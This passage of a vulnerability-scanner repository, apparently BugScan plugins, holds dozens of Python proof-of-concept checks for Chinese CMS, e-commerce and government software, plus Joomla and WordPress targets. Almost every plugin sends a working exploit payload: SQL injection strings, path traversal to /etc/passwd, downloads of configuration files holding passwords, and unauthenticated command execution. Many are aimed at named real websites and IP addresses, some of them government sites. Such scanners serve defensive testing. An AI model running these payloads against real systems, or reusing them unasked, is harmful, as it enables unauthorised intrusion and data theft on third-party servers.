14 |     url=arg+"Broadcast/displayNewsPic.aspx?id=00187/**/and/**/1=convert(int,char(71)%2Bchar(65)%2Bchar(79)%2Bchar(74)%2Bchar(73))"
15 |     code,head,res,errcode,_=curl.curl2(url)
16 |     if code==500 and 'GAOJI' in res:
17 |         security_hole(url)
18 | if __name__=="__main__":
19 |     from dummy import *
20 |     audit(assign('lcecgap','http://www.lcxz.cn/liaochengwaiwang/')[1])
21 |     audit(assign('lcecgap','http://111.63.13.179/')[1])


--------------------------------------------------------------------------------
/plugins/mbbcms/467.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #__Author__ = gxtester
 4 | #ref http://sebug.net/vuldb/ssvid-61201
 5 | 
 6 | def assign(service, arg):
 7 |     if service == "mbbcms":  
 8 |         return True, arg 
 9 | 
10 | def audit(arg):
11 |     payload = "?mod=article&act=detail&id=adhan%27%20union%20select%201,2,md5(%27bb2%27),4,5%20and%20%27memang%27=%27ganteng"
12 |     url = arg + payload
13 |     code, head, res, errcode, final_url = curl.curl('%s' % url)
14 |   
15 |     if code == 200:
16 |        if '0c72305dbeb0ed430b79ec9fc5fe8505' in res: 
17 |            security_hole(url) 
18 | 
19 | if __name__ == "__main__":
20 |     from dummy import *
21 |     audit(assign('mbbcms', 'http://127.0.0.1/mbbcms/')[1])
22 | 


--------------------------------------------------------------------------------
/plugins/shopbuilder/564.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #from:http://www.wooyun.org/bugs/wooyun-2014-067088
 4 | 
 5 | def assign(service,arg):
 6 |     if service == "shopbuilder":
 7 |         return True, arg
 8 | 
 9 | def audit(arg):
10 |     payload = "X-Forwarded-For:127.0.0.1' and extractvalue(1,concat(0x3a,md5(3.14),0x3a)) and '1"
11 |     url = arg + 'index.php'
12 |     code, head, res, errcode,finalurl =  curl.curl('"-H %s %s"' % (payload,url))
13 |     
14 |     if code == 200 and '4beed3b9c4a886067de0e3a094246f7' in res:
15 |         security_hole('find X-Forwarded-For sql inject:'+url)
16 | 
17 | if __name__ == "__main__":
18 |     from dummy import *
19 |     audit(assign('shopbuilder', 'http://www.zgzyjczs.com/')[1])


--------------------------------------------------------------------------------
/plugins/skytech/2714.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #南京擎天政务系统越权
 4 | #refer:http://www.wooyun.org/bugs/wooyun-2010-081902
 5 | #__author__ = 'xq17'
 6 | 
 7 | def assign(service, arg):
 8 |     if service == "skytech":
 9 |         return True, arg
10 | 
11 | def audit(arg):
12 |     url = arg
13 |     payload = 'admin/operate_log_page.aspx'
14 |     verify_url = url +  payload
15 |     code, head, res, errcode, _ = curl.curl2(verify_url)
16 |     if code == 200 and 'caseimportdoclist' in res and "searchpage_input" in res:
17 |         security_info(verify_url)
18 |         security_info(url + payload)
19 | 
20 | if __name__ == '__main__':
21 |     from dummy import *
22 |     audit(assign('skytech','http://58.222.211.21/')[1])
23 | 


--------------------------------------------------------------------------------
/plugins/cmseasy/827.py:
--------------------------------------------------------------------------------
 1 | import re
 2 | def assign(service,arg):
 3 |     if service == 'cmseasy':
 4 |         return True,arg
 5 | def audit(arg):
 6 |     url = arg + '/celive/live/header.php'
 7 |     payload = ("xajax=LiveMessage&xajaxargs[0]=<xjxobj><q><e><k>name</k><v>%27,"
 8 |                "(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(md5(1))),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)--%20</v></e></q></xjxobj>")
 9 |     code,head,body,errcode,fina_url=curl.curl('-d "%s" %s'%(payload,url))
10 |     if code == 200 and 'c4ca4238a0b923820dcc509a6f75849' in body:
11 |         security_hole(url)
12 | if __name__ == '__main__':
13 |         from dummy import *
14 |         audit(assign('cmseasy','http://www.mldclub.com.cn/')[1])
15 |         
16 | 


--------------------------------------------------------------------------------
/plugins/fangwei/1805.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #__Author__ = Mr.R
 4 | #_PlugName_ = 方维团购 v4.3 /index.php SQL注入漏洞
 5 | 
 6 | 
 7 | 
 8 | def assign(service, arg):
 9 |     if service == "fangwei":
10 |         return True, arg
11 | 
12 | def audit(arg):
13 |     payload = arg+'index.php?ctl=ajax&act=load_topic_reply_list'
14 |     post = "topic_id=-1 union select%0b1,2,3,concat('~~~',md5(123),'~~~'),5,6,7,8,9%23"
15 |     code, head, body, _, _ = curl.curl2(payload, post=post)
16 |     if code == 200 and '~~~202cb962ac59075b964b07152d234b70~~~' in body:
17 |         security_hole('方维o2o系统index.php sql注入')
18 | 
19 | if __name__ == '__main__':
20 |     from dummy import *
21 |     audit(assign('fangwei', 'http://o2odemo.fanwe.net/')[1])


--------------------------------------------------------------------------------
/plugins/iwebshop/1354.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | #-*- coding:utf-8 -*-
 3 | #Author:judger
 4 | #SerType:iwebshop SQL-Injection
 5 | def assign(service, arg):
 6 |     if service == "iwebshop":
 7 |         return True, arg
 8 | 
 9 | def audit(arg):
10 |     payload = '''index.php?controller=site&action=getProduct&specJSON={"judger":"1'%20and%201=0%20union%20select%20md5(1),2,3,4,5,6,7,8,9%20and%20'1'%20=%20'1"}'''
11 |     url = arg + payload
12 |     code, head, body, errcode, _url = curl.curl2(url)
13 |     if code == 200 and 'c4ca4238a0b923820dcc509a6f75849b' in body:
14 |         security_hole('SQL-Injection:' + url)
15 | 
16 |     
17 | if __name__ == '__main__':
18 |     from dummy import *
19 |     audit(assign('iwebshop', 'http://www.eastcang.com/')[1])


--------------------------------------------------------------------------------
/plugins/jinqiangui_p2p/1798.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | #-*- encoding:utf-8 -*-
 3 | #title:JianQianGui P2P SQL injection
 4 | #author: Jumbo
 5 | #ref: http://www.wooyun.org/bugs/wooyun-2010-0135528
 6 | 
 7 | 
 8 | 
 9 | def assign(service, arg):
10 |     if service == "jinqiangui_p2p":
11 |         return True, arg
12 | 
13 | 
14 | def audit(arg):
15 |     payload = "?plugins&q=areas&name=&type=p,c&area=updatexml(1,concat(0x5c,md5(1)),1)#"
16 |     url = arg + payload
17 |     code, head,res, errcode, _url = curl.curl2(url)
18 |     if code==200 and 'c4ca4238a0b923820dcc509a6f75849' in res:
19 |         security_hole(url)
20 | 
21 | if __name__ == '__main__':
22 |     from dummy import *
23 |     audit(assign('jinqiangui_p2p', 'http://demo1.wangdaixitong.com/')[1])


--------------------------------------------------------------------------------
/plugins/joomla/1671.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #Refer https://cxsecurity.com/issue/WLB-2015110194
 4 | 
 5 | def assign(service, arg):
 6 |     if service == "joomla":
 7 |         return True, arg
 8 | 
 9 | def audit(arg):
10 |     payload = 'index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder'
11 |     url = arg + payload
12 |     code, head, res, errcode, _ = curl.curl2(url)
13 |     if code == 200 and 'Upload files' in res and 'P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"' in head:
14 |         security_hole(url)
15 | 
16 | 
17 | if __name__ == '__main__':
18 |     from dummy import *
19 |     audit(assign('joomla', 'drugfreeclubsofamerica.com/')[1])


--------------------------------------------------------------------------------
/plugins/netpower/1957.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | #-*- coding:utf-8 -*-
 3 | #info:http://www.wooyun.org/bugs/wooyun-2015-0140998
 4 | import urlparse
 5 | def assign(service, arg):
 6 |     if service == 'netpower':
 7 |         arr = urlparse.urlparse(arg)
 8 |         return True, '%s://%s/' % (arr.scheme, arr.netloc)
 9 | 
10 | def audit(arg):
11 |     url = arg + 'direct/polling/CommandsPolling.php'
12 |     postdata = "command=ping&filename=/etc/shadow&cmdParam=qq.com"
13 |     code, head, res, errcode, _ = curl.curl2(url,post=postdata)
14 |     if code==200 and '"data":["dealing","root' in res:
15 |         security_hole(url)
16 | 
17 | if __name__ == '__main__':
18 |     from dummy import *
19 |     audit(assign('netpower', 'https://222.92.199.138/')[1])


--------------------------------------------------------------------------------
/plugins/panabit/2108.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | #-*- coding:utf-8 -*-
 3 | #info:http://www.wooyun.org/bugs/wooyun-2015-0140998
 4 | import urlparse
 5 | def assign(service, arg):
 6 |     if service == "panabit":
 7 |         arr = urlparse.urlparse(arg)
 8 |         return True, '%s://%s/' % (arr.scheme, arr.netloc)
 9 | 
10 | def audit(arg):
11 |     url = arg + 'Maintain/cmdhandle.php'
12 |     postdata = "cmd=ifconfig"
13 |     code, head, res, errcode, _ = curl.curl2(url,post=postdata)
14 |     if code==200 and 'netmask' in res and 'broadcast' in res and 'inet' in res:
15 |         security_hole("Panabit某流量分析管理系统命令执行：post:cmd=命令")
16 | 
17 | if __name__ == '__main__':
18 |     from dummy import *
19 |     audit(assign('panabit', 'http://112.91.216.180/')[1])


--------------------------------------------------------------------------------
/plugins/piaoyou/2482.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/evn python 
 2 | #--coding:utf-8--*--
 3 | #Name:票友系统一处通用SQL注入
 4 | #Refer:http://www.wooyun.org/bugs/wooyun-2010-0128323
 5 | #Author:xq17
 6 | 
 7 | def assign(service, arg):
 8 |     if service == "piaoyou":
 9 |         return True, arg
10 |                 
11 | def audit(arg): 
12 |         url = arg + 'flight/view_xz.aspx?a=1+and+1=sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27))--'
13 |         code, head, res, errcode, _ = curl.curl2(url)
14 |         if code == 500 or code == 200 and '81dc9bdb52d04dc20036dbd8313ed055' in res :
15 |             security_hole(arg + '  :found sql Injection')
16 | 
17 | if __name__ == '__main__':
18 |     from dummy import *
19 |     audit(assign('piaoyou','http://www.iyoungsh.com/')[1])


--------------------------------------------------------------------------------
/plugins/piaoyou/2603.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/evn python 
 2 | #--coding:utf-8--*--
 3 | #Name:票友票务系统通用sql注入#1（简单绕防注入）
 4 | #Refer:http://www.wooyun.org/bugs/wooyun-2010-0128323
 5 | #Author:xq17
 6 | 
 7 | def assign(service, arg):
 8 |     if service == "piaoyou":
 9 |         return True, arg
10 |                 
11 | def audit(arg): 
12 |         url = arg + 'tickets/int_order.aspx?id=1/**/and+1=sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27))--'
13 |         code, head, res, errcode, _ = curl.curl2(url)
14 |         if code!=0 and '81dc9bdb52d04dc20036dbd8313ed055' in res :
15 |             security_hole(url + '  :found sql Injection')
16 | 
17 | if __name__ == '__main__':
18 |     from dummy import *
19 |     audit(assign('piaoyou','http://www.iyoungsh.com/')[1])


--------------------------------------------------------------------------------
/plugins/www/2426.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # refer:http://www.wooyun.org/bugs/wooyun-2010-0144595
 3 | 
 4 | import urlparse
 5 | def assign(service, arg):
 6 |     if service == "www":
 7 |         r = urlparse.urlparse(arg)
 8 |         return True, 'https://%s:4848/' %(r.netloc)
 9 | 
10 | def audit(arg):
11 |     payload = 'theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'
12 |     code, head, res, errcode, _ = curl.curl2(arg + payload)
13 |     if code == 200 and '/bin/bash' in res:
14 |         security_hole(arg+payload)
15 |         
16 | if __name__ == '__main__':
17 |     from dummy import *
18 |     audit(assign('www', 'https://14.17.126.156/')[1])


--------------------------------------------------------------------------------
/plugins/www/319.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #POC Name   :   XAMPP <= 1.7.3 File disclosure vulnerability
 4 | #Reference  :   http://www.exploit-db.com/exploits/15370/
 5 | 
 6 | import urlparse
 7 | def assign(service, arg):
 8 |     if service == 'www':
 9 |         arr = urlparse.urlparse(arg)
10 |         return True, '%s://%s/' % (arr.scheme, arr.netloc)
11 | 
12 | 
13 | def audit(arg):
14 |     url = arg + "xampp/showcode.php/showcode.php?showcode=1"
15 |     code, head, res, errcode,finalurl =  curl.curl(url)
16 |     if res.find('file_get_contents') != -1 :
17 |         security_hole('Verify url: ' + url)
18 | 
19 | if __name__ == '__main__':
20 |     from dummy import *
21 |     audit(assign('www', 'http://www.example.com/')[1])


--------------------------------------------------------------------------------
/plugins/yongyou_zhiyuan_a6/2675.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #__Author__ = Mr.R
 4 | #_PlugName_ = 用友致远A6 initData.jsp敏感信息泄露
 5 | #__Refer___ = http://www.wooyun.org/bugs/wooyun-2015-0107543
 6 | 
 7 | 
 8 | def assign(service, arg):
 9 |     if service == 'yongyou_zhiyuan_a6':
10 |         return True, arg
11 | 
12 | 
13 | def audit(arg):
14 |     payload = 'yyoa/common/selectPersonNew/initData.jsp?trueName=1'
15 |     target = arg + payload
16 |     code, head, res, errcode, _ = curl.curl2(target)
17 |     if code == 200 and 'personList' in res and 'new Person' in res:
18 |         security_warning(target)
19 | if __name__ == '__main__':
20 |     from dummy import *
21 |     audit(assign('yongyou_zhiyuan_a6', 'http://60.31.196.2/')[1])


--------------------------------------------------------------------------------
/plugins/7stars/2663.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/evn python
 2 | #-*-:coding:utf-8 -*-
 3 | #Author:404
 4 | #Name:北斗星电子政务系统SQL注入漏洞
 5 | #Refer:http://www.wooyun.org/bugs/wooyun-2010-076736
 6 | 
 7 | def assign(service,arg):
 8 |     if service=="7stars":
 9 |         return True,arg 
10 |     
11 | 
12 | 
13 | def  audit(arg):
14 |     url=arg+"sssweb/SuggestionCollection/PostSuggestion.aspx?ID=1%27+and+1=char(73)%2Bchar(73)%2Bchar(73)%2B@@version+and+%27a%27=%27a"
15 |     code,head,res,errcode,_=curl.curl2(url)   
16 |     if code==500 and 'IIIMicrosoft' in res:
17 |         security_hole(url)
18 | 
19 | if __name__=="__main__":
20 |     from dummy import *
21 | 
22 |     audit(assign('7stars','http://www.hysczj.gov.cn/')[1])
23 |     audit(assign('7stars','http://zx.cq.gov.cn/')[1])


--------------------------------------------------------------------------------
/plugins/dedecms/107.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #__author__ = 'Ario'
 4 | 
 5 | def assign(service, arg):
 6 |     if service == "dedecms":
 7 |         return True, arg
 8 | 
 9 | def audit(arg):
10 |     url = arg
11 |     _, head, body, _, _ = curl.curl(url + '/plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa%5c%27and+char(@`%27`)+/*!50000Union*/+/*!50000SeLect*/+1,2,3,md5(0x40776562736166657363616E40),5,6,7,8,9%20from%20`%23@__admin`%23')
12 |     if body and body.find('2e0e20673083dea5cc87a85d54022049') != -1:
13 |         security_hole(url)
14 | 
15 | if __name__ == '__main__':
16 |     from dummy import *
17 |     audit(assign('dedecms', 'http://www.example.com/')[1])
18 | 


--------------------------------------------------------------------------------
/plugins/fsmcms/1697.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | #-*- encoding:utf-8 -*-
 3 | #__author__ = '这个程序员不太冷'
 4 | #ref http://www.wooyun.org/bugs/wooyun-2015-0135311
 5 | def assign(service, arg):
 6 |     if service == "fsmcms":
 7 |         return True, arg
 8 | 
 9 | 
10 | def audit(arg):
11 |     
12 |     payload = 'cms/webapp/critic/p_criticfrontlist.jsp?TID=1%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,md5(1234),NULL,NULL%23'
13 |     url = arg + payload
14 |     code, head,res, errcode, _ = curl.curl2(url)
15 |     if '81dc9bdb52d04dc20036dbd8313ed055' in res:
16 |         security_hole(url)
17 | 
18 |                         
19 | if __name__ == '__main__':
20 |     from dummy import *
21 |     audit(assign('fsmcms','http://125.45.213.81:8080/fsmcms/')[1])


--------------------------------------------------------------------------------
/plugins/joomla/1637.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | #-*- encoding:utf-8 -*-
 3 | # Joomla cckjseblod exploit LFD
 4 | #eg:http://www.starmarketingonline.com/index.php
 5 | #https://www.bugscan.net/#!/x/22903
 6 | 
 7 | def assign(service, arg):
 8 |     if service == 'joomla':
 9 |         return True, arg
10 | 
11 | 
12 | def audit(arg):
13 |     payload = 'index.php?option=com_cckjseblod&task=download&file=configuration.php'
14 |     url = arg + payload
15 |     code, head,res, errcode, _ = curl.curl2(url)
16 |     if code == 200 and 'class JConfig {' in res and '$log_path' in res and '$password' in res:
17 |         security_warning(url)
18 | 
19 | if __name__ == '__main__':
20 |     from dummy import *
21 |     audit(assign('joomla','http://www.starmarketingonline.com/')[1])


--------------------------------------------------------------------------------
/plugins/lianbangsoft/1740.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | 
 4 | '''
 5 | author: Smeet
 6 | name: lianbangsoft_sp_xksx_sqli
 7 | 
 8 | '''
 9 | def assign(service, arg):
10 |     if service == 'lianbangsoft':
11 |         return True, arg
12 |         
13 | def audit(arg):
14 |     data = "workplate/xzsp/gxxt/tjfx/dtl.aspx?id=76001&refnum=137&baseorg=209&flag=''&xksx=928+AND+1=sys.fn_varbintohexstr(hashbytes('MD5','1234'))-- "
15 |     url = arg + data
16 |     code, head, res, errcode, _ = curl.curl2(url)
17 |     if code==500 and '81dc9bdb52d04dc20036dbd8313ed055' in res:
18 |         security_hole(url)
19 | 
20 | if __name__ == '__main__':
21 |     from dummy import *
22 |     audit(assign('lianbangsoft', 'http://www.hbsxxzfwzx.gov.cn/')[1])


--------------------------------------------------------------------------------
/plugins/php168/1170.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #__Author__ = 01001000entai
 4 | #_PlugName_ = php168 zhidao sql
 5 | #__Refer___ = http://www.wooyun.org/bugs/wooyun-2010-013476
 6 | 
 7 | import re
 8 | 
 9 | def assign(service, arg):
10 |     if service == 'php168':
11 |         return True, arg
12 | 
13 | def audit(arg):
14 |     payload = 'zhidao/user.php?j=question&u=-1+union+select+1,2,3,md5(1),5,6,7,8--'
15 |     target = arg + payload
16 |     code, head, body, errcode, final_url = curl.curl(target)
17 |     if code == 200 and 'c4ca4238a0b923820dcc509a6f75849b' in body:
18 |         security_hole(target)
19 | 
20 | if __name__ == '__main__':
21 |     from dummy import *
22 |     audit(assign('php168', 'http://www.chcmcc.com/')[1])


--------------------------------------------------------------------------------
/plugins/phpcms/690.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #from:http://0day5.com/archives/319
 4 | 
 5 | def assign(service,arg):
 6 |     if service == "phpcms":
 7 |         return True, arg
 8 | 
 9 | def audit(arg):
10 |     url = arg + '/index.php?m=poster&c=index&a=poster_click&id=1'
11 |     payload = "Referer:',(SELECT 1 FROM(SELECT COUNT(*),CONCAT(user(),FLOOR(RAND(0)*2))X FROM information_schema.tables GROUP BY X)a),'1')#"
12 |     code, head, res, errcode,finalurl =  curl.curl("-H \"%s\" %s" % (payload,url))
13 | 
14 |     if code == 200 and res.find("for key 'group_key'") != -1:
15 |         security_hole(url)
16 | 
17 | if __name__ == "__main__":
18 |     from dummy import *
19 |     audit(assign('phpcms', 'http://9expo.gzdsw.com/')[1])


--------------------------------------------------------------------------------
/plugins/srun_gateway/1928.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | #-*- coding:utf-8 -*-
 3 | #配置文件下载，内有root密码md5
 4 | #ref:http://wooyun.org/bugs/wooyun-2014-067666
 5 | 
 6 | import urlparse
 7 | def assign(service, arg):
 8 |     if service == 'srun_gateway':
 9 |         arr = urlparse.urlparse(arg)
10 |         return True, '%s://%s:8800/' % (arr.scheme, arr.netloc)
11 | 
12 | def audit(arg):
13 |     poc = arg + 'index.php?action=login&ts=download&file=/srun3/etc/srun.conf'
14 |     code, head, res, errcode, _ = curl.curl2(poc)
15 |     if 'username' in res and 'root_pass' in res:
16 |         security_hole("Srun_3000 Gate vulnerable!:"+poc)
17 | 
18 | if __name__ == '__main__':
19 |     from dummy import *
20 |     audit(assign('srun_gateway', 'http://60.166.5.177:8800/')[1])


--------------------------------------------------------------------------------
/plugins/startbbs/333.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #__Author__ = LinE
 4 | #_PlugName_ = StartBBS Absolute Path Leakage
 5 | #_Function_ = StartBBS 物理路径泄露
 6 | #_FileName_ = StartBBS_Absolute_Path_Leakage.py
 7 | 
 8 | def assign(service, arg):
 9 |     if service == "startbbs":
10 |         return True, arg 
11 | 
12 | def audit(arg):
13 |     payload = 'index.php/home/getmore/w.jsp'
14 |     target = arg + payload
15 |     code, head, res, errcode, _ = curl.curl('%s' % (target))
16 |     Check_String = "Filename:"
17 |     if code == 500:
18 |     	if Check_String in res:
19 |     		security_warning(target)
20 | 
21 | if __name__ == '__main__':
22 |     from dummy import *
23 |     audit(assign('startbbs', 'http://test.l1n3.net')[1])
24 | 


--------------------------------------------------------------------------------
/plugins/wordpress/443.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #by lkz
 4 | import re
 5 | 
 6 | def assign(service, arg):
 7 |     if service == "wordpress":
 8 |         return True, arg
 9 | 
10 | def audit(arg):
11 |     url = arg
12 |     target = url + 'wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php'
13 |     post_data = 'post_id=1/**/and/**/1%3d2/**/union/**/select%20md5(123)%23&up_type=c_like'
14 |     code, head, res, _,_ = curl.curl('-d %s %s' % (post_data,target))
15 |     if code == 200 and '202cb962ac59075b964b07152d234b70' in res :
16 |         security_hole(target)
17 | 
18 | if __name__ == '__main__':
19 |     from dummy import *
20 |     audit(assign('wordpress', 'http://127.0.0.1/wordpress/')[1])


--------------------------------------------------------------------------------
/plugins/www/1076.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python 
 2 | # -*- coding: utf-8 -*- 
 3 | #__author__ = 'ifk' 
 4 | #Refer https://www.bugscan.net/#!/x/2982
 5 | 
 6 | import urlparse
 7 | def assign(service, arg):
 8 |     if service == 'www':
 9 |         arr = urlparse.urlparse(arg)
10 |         return True, '%s://%s/' % (arr.scheme, arr.netloc)
11 | 		
12 | def audit(arg): 
13 |     url = 'diagnostic.php'
14 |     payload = 'act=ping&dst=www.baidu.com'
15 |     code, head, res, errcode, _ = curl.curl2(arg+url,payload)
16 |     if code == 200 and '<report>OK' in res:
17 |         security_hole('dlink unauthenticated command injection '+arg+url)
18 | 				
19 | if __name__ == '__main__': 
20 |     from dummy import *
21 |     audit(assign('www', 'http://83.233.183.198:8080/')[1])


--------------------------------------------------------------------------------
/plugins/yongyou_fe/1503.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #ref: http://www.wooyun.org/bugs/wooyun-2015-0116706
 4 | 
 5 | def assign(service, arg):
 6 |     if service == "yongyou_fe":
 7 |         return True, arg
 8 |         
 9 | def audit(arg):
10 |     payload = 'common/codeMoreWidget.jsp?code=12%27%20UNION%20ALL%20SELECT%20sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27))--'
11 |     url = arg + payload
12 |     code, head, res, errcode, _ = curl.curl2(url)
13 |     if (code == 500 or code == 200) and '81dc9bdb52d04dc20036dbd8313ed055' in res:
14 |         security_hole(url + '   found sql injection!')
15 | 
16 | if __name__ == '__main__':
17 |     from dummy import *
18 |     audit(assign('yongyou_fe', 'http://fe.hy-la.com:8088/')[1])


--------------------------------------------------------------------------------
/plugins/360shop/2732.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/evn python 
 2 | #--coding:utf-8--*--
 3 | #Name:启博淘店通标准版任意文件遍历漏洞
 4 | #Refer:http://www.wooyun.org/bugs/wooyun-2015-0148274
 5 | #Author:xq17
 6 | def assign(service, arg):
 7 |     if service == "360shop":
 8 |         return True, arg
 9 | 
10 | def audit(arg):
11 |     payload = arg + "?mod=goods&do=../../../../../../../../../etc/passwd%00.jpg&class_id=25"
12 |     code, head, res, errcode, _ = curl.curl2(payload)
13 |     if code ==200 and 'bin/bash' in res and "root" in res:
14 |          security_info(payload+':Any reading ' )
15 |          
16 | if __name__ == '__main__':
17 |         from dummy import *
18 |         audit(assign('360shop','http://www.10n9w.com/')[1])
19 |         audit(assign('360shop','http://www.xingcl.com/')[1])


--------------------------------------------------------------------------------
/plugins/5clib/2798.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #__Author__ = 奶权
 4 | #_PlugName_ = 五车图书管系统越权添加管理员
 5 | #__Refer___ = http://www.wooyun.org/bugs/wooyun-2010-0128686
 6 | import re
 7 | def assign(service, arg):
 8 |     if service == '5clib':
 9 |         return True, arg
10 | def audit(arg):
11 |     payload = '5clib/Inuseraction.action?actionkind=reg'
12 |     target = arg + payload
13 |     
14 |     code, head, res, errcode, _ = curl.curl2(target);
15 |     if code == 200 and "isIdCards()" in res and 'addressprompt' in res:
16 |         security_hole(target)
17 | if __name__ == '__main__':
18 |     from dummy import *
19 |     audit(assign('5clib', 'http://58.119.33.50:8081/')[1])
20 |     audit(assign('5clib', 'http://222.208.6.176:8081/')[1])


--------------------------------------------------------------------------------
/plugins/cmseasy/839.py:
--------------------------------------------------------------------------------
 1 | import re
 2 | def assign(service,arg):
 3 |     if service == "cmseasy":
 4 |         return True,arg
 5 | def audit(arg):
 6 |     payload = "index.php?case=archive&act=orders&aid[typeid%60%3d1%20UNION%20SELECT/**/1,2,3,concat%28md5%281%29%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58%20from%20cmseasy_archive%20ORDER%20BY%201%23]=1"
 7 |     url = arg + payload
 8 |     code ,head,res,body,_ = curl.curl(url)
 9 |     if code == 200 and 'c4ca4238a0b923820dcc509a6f75849b' in res:
10 |         security_warning(url)
11 | if __name__ == '__main__':
12 |     from dummy import *
13 |     audit(assign('cmseasy','http://www.ruifanshihua.com/')[1])


--------------------------------------------------------------------------------